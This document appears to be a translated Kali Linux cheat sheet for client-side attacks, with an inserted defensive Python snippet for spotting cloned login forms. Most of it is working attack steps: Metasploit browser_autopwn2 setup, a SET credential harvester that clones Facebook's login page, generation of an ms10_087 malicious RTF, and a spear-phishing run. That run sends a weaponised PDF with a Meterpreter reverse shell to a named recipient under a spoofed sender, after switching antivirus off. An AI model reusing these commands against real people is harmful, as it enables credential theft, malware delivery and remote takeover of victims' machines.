Kali client-side attacks
Browser attacks: browser_autopwn2 (BAP2)
mkdir /test   # create a directory for the server that receives the responses
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.56.1
set URIPATH /test
# Assume the target is a PC and that we do not intend to rely on Adobe Flash authorization. We exclude the Android and Flash exploits.
set EXCLUDE_PATTERN android|adobe_flash
show advanced   # view the full list of advanced options
set ShowExploitList true
set VERBOSE true
exploit
Get the target browser to visit http://192.168.56.1/test
Stealing browser login credentials:
root@bt:# service apache2 start
root@bt:# setoolkit
Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner
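IP address for the POST back in Harvester/Tabnabbing: (enter the local machine's IP)
set:webattack> Enter the url to clone:http://www.facebook.com (the page to clone and spoof)
This generates 3 files under /var/www/, saved in the html folder. Visiting the local machine's IP now shows an identical login page; if the target logs in, the password is stored in the generated harvester file.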
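From the defender's side, the cloned login page described above is served from, and posts credentials back to, the operator's IP rather than the brand's own domain. The following check is an added example, not code from the original post or from SET; the function name, the brand-domain list and both HTML samples are constructed for illustration, and it assumes the password form's POST target resolves to the host serving the clone.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class _FormCollector(HTMLParser):
    """Collects the action and password-field flag of every <form> on a page."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def suspicious_login_forms(html, page_url, brand_domains):
    """Return [(post_target, reason)] for password forms that post off-brand."""
    collector = _FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue  # only forms that collect a password are of interest
        # An empty or relative action resolves against the URL the page came from.
        target = urljoin(page_url, form["action"])
        host = (urlsplit(target).hostname or "").lower()
        if _is_ip(host):
            findings.append((target, "posts credentials to a bare IP address"))
        elif not any(host == d or host.endswith("." + d) for d in brand_domains):
            findings.append((target, "posts credentials outside the brand's domains"))
    return findings

# Constructed samples: a clone served from 192.168.56.1 and a same-origin login form.
CLONED = '<form action="http://192.168.56.1/" method="post"><input name="email"><input type="password" name="pass"></form>'
GENUINE = '<form action="/login.php" method="post"><input type="password" name="pass"></form>'
```

A mail or web gateway can run this over fetched landing pages, passing the domains of the brand the page imitates as `brand_domains`.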
Office
The ms10_087 vulnerability: execute a custom exe file
msf > db_status
postgresql selected, no connection
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
msf > search office
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
root@kali:~# cd /root/.msf4/local   # the generated msf.rtf
/*************************************************************************/
MailAttack
set> 1 Social-Engineering Attacks
set> 1 Spear-Phishing Attack Vectors
set:phishing>1 Perform a Mass Email Attack
set:payloads>6 Adobe CoolType SING Table "uniqueName" Overflow
set:payloads>2 Windows Meterpreter Reverse_TCP
set:payloads> Port to connect back on [443]:
All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
=ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E
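Special handling is then required. This vulnerability targets Adobe Reader versions before 9.3.4.
Copy template.pdf to a machine with Adobe Acrobat Pro 9.5.0 installed (with antivirus software turned off), open template.pdf, modify it, then copy it back to the original directory, overwriting the original template.pdf.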
set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf
set:phishing>1 E-Mail Attack Single Email Address
set:phishing>2 One-Time Use Email Template
set:phishing> Subject of the email:ABC Project Status
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: Hi Wang:
Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice.
Next line of the body:
Next line of the body: Best Regard!
Next line of the body: li Ming
Next line of the body: ^C
set:phishing> Send email to:wangdongpeng@dvssc.com
set:phishing>2 Use your own server or open relay
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> Username for open-relay [blank]:yourname
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes